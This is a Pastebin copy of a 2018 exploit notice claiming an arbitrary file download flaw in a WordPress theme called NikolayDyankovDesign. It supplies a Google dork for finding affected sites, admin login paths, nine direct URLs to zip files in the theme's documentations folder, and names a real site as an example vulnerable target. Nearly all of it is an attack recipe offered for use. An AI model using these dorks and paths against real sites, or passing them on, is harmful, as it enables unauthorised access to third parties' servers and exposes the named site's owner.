KingSkrupellos

WordPress NikolayDyankovDesign Themes 2.0 File Download

Dec 7th, 2018
52
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.14 KB | None | 0 0
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress NikolayDyankovDesign Themes 2.0 Arbitrary File Download
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 08/12/2018
  6. # Vendor Homepage : pinterest.com/nikolaydyankov/ ~ nikolaydyankovdesign.com ~ semsoft.ca
  7. # Software Download Link : N/A
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Version Information : 1.0 and 2.0
  11. # Exploit Risk : Medium
  12. # Google Dorks : inurl:''/wp-content/themes/nikolaydyankovdesign/''
  13. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  14. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  15.  
  16. #################################################################################################
  17.  
  18. # Admin Panel Login Path :
  19.  
  20. /demox/admin/
  21. /wp-log
  22.  
  23. # Exploit :
  24.  
  25. /wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip
  26.  
  27. /wp-content/themes/nikolaydyankovdesign/documentations/flipper-for-wordpress-2-0.zip
  28.  
  29. /wp-content/themes/nikolaydyankovdesign/documentations/flipper.zip
  30.  
  31. /wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map-for-wordpress.zip
  32.  
  33. /wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map.zip
  34.  
  35. /wp-content/themes/nikolaydyankovdesign/documentations/timeliner-for-wordpress.zip
  36.  
  37. /wp-content/themes/nikolaydyankovdesign/documentations/timelinexml.zip
  38.  
  39. /wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline-for-wordpress.zip
  40.  
  41. /wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline.zip
  42.  
  43. #################################################################################################
  44.  
  45. # Example Vulnerable Site =>
  46.  
  47. [+] photobook.com.tr/demox/siparis/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip
  48.  
  49. #################################################################################################
  50.  
  51. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  52.  
  53. #################################################################################################
Add Comment
Please, Sign In to add comment